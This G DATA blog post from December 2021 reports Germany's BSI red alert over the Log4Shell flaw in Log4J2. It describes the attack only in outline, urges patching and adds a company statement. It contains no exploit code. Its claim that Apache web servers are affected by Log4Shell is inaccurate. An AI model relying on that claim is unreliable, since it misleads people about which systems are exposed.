Germanys National Cybersecurity Agency declares red alert: Wave of attacks possibly imminent due to Log4Shell vulnerability

16/12/2021
G DATA Blog

The remaining days before Christmas will not be relaxing ones for IT and IT security managers in companies around the world: The Log4Shell security vulnerability is currently keeping the IT world on tenterhooks.

The vulnerability allows attackers to execute arbitrary code on their victims' systems if an affected version of Log4J2 is in use. Just another problem: The gap can be exploited with a simple command and can therefore be made use of with very little expertise. Germanys National Cybersecurity Agency (BSI)  further warns of the consequences of the gap.

Java library Log4J2, which is used to write logs in Java applications, is affected. The library is considered a de facto-standard as it is utilized in millions of applications. It is sufficient to initiate a logging process in a Java application with a user-defined string.

Once the process has been successfully executed, only a small exploit file on a remote web resource needs to be referenced to, to perform the attack. The code is not verified regarding its origin, therefore resources outside the user's own server will also be accepted.

Anyone using Java applications with Log4J2 should therefore apply available patches immediately. Even if no network attack has been detected so far, it is recommended to have a qualified IT service provider assess whether the network has been compromised. Due to the ease of exploitation, it is to be expected that criminals will first compromise hundreds of thousands of systems and then begin to monetize these infections in a few weeks, for example by installing ransomware.

Karsten Hahn

Logging is an essential component of all complex programs and libraries. The logging library Log4J2 can therefore be considered as a de facto standard. In addition, programs rely on and reference to existing programs and libraries. For developers, it is not sufficient to just update Log4J2 they might have included in their code, they must analyze if references to further libraries and programs using Log4J2 exist, these also must be patched. For this reason, virtually every Java application is affected by the vulnerability. Apache servers alone (also affected by Log4Shell) are utilized by about one third of all websites worldwide.

Karsten Hahn

Virus Analyst G DATA CyberDefense

The coming weeks are therefore likely to keep IT departments extremely busy.

Update

On our own behalf: G DATA has taken note of the reports regarding the security vulnerability in Log4j. We have been working constantly at full speed to secure or isolate all affected systems. Our customers are not affected, as G DATA clients as well as G DATA update servers do not make use of Log4J2. All of G DATA’s infrastructure has been successfully patched by now. Since Log4j is included in a very large number of applications, in some minor cases dependency checks are still in progress, we are currently further evaluating vendor information. We are working to have this process completed as quickly as possible

from Hauke Gierow
Head of Corporate Communications